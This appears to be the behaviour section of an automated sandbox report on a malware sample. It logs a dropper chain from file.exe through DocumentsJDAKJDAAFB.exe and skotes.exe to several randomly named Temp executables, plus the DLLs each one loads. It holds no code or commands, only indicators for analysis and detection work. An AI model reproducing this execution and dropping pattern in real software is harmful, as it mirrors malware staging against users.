Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7188 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7336 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2988 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2536,i,9771309925209288626,10707726605779976435,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAKJDAAFB.exe "C:\Users\user\DocumentsJDAKJDAAFB.exe"
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Section loaded: wininet.dll
